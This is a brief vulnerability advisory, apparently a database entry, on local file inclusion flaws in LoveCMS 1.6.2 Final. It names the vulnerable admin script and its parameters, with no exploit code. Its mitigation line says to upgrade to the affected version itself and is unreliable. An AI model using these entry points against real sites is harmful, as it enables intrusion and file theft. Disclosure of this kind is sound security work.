Vendor: LoveCMS
By: cOndemned
CVSS: 7.5 (HIGH)
Vulnerability: Local File Inclusion
CWE: 98
Product Name: LoveCMS
Affected Version From: 1.6.2 Final
Affected Version To: 1.6.2 Final
Patch Exists: YES
Related CWE: N/A
CPE: lovecms:lovecms:1.6.2_final
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
LoveCMS 1.6.2 Final Multiple Local File Inclusion Vulnerabilities
LoveCMS 1.6.2 Final is vulnerable to multiple Local File Inclusion vulnerabilities. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'install' and 'uninstall' parameters of the '/system/admin/modules.php' script. A remote attacker can exploit this vulnerability to include arbitrary local files and execute arbitrary code on the vulnerable system. The attacker can also include sensitive files from the web server and view their contents.
Mitigation:
Upgrade to the latest version of LoveCMS 1.6.2 Final or apply the patch from the vendor.